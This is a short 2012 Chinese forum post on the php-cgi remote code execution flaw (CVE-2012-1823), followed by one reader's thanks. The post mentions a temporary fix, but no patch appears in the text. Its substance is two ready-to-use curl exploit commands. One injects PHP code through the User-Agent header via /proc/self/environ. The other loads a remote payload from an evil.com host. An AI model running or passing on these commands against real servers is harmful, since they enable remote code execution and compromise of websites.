天空小小岛技术网站
标题:
php-cgi远程代码执行
[打印本页]
作者:
s.Bo
时间:
2012-5-4 14:49
标题:
php-cgi远程代码执行
php-cgi远程代码执行,FastCGI不受影响。PHP官方暂时未发布补丁,请受影响的站长按文章下方提供的方式打好临时补丁。
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
1、本地包含直接执行代码:
curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
复制代码
2、远程包含执行代码:
curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt
复制代码
作者:
kk7769640
时间:
2012-9-23 13:50
楼主太厉害了,谢谢分享!
欢迎光临 天空小小岛技术网站 (http://tkxxd.net/)
Powered by Discuz! X3.1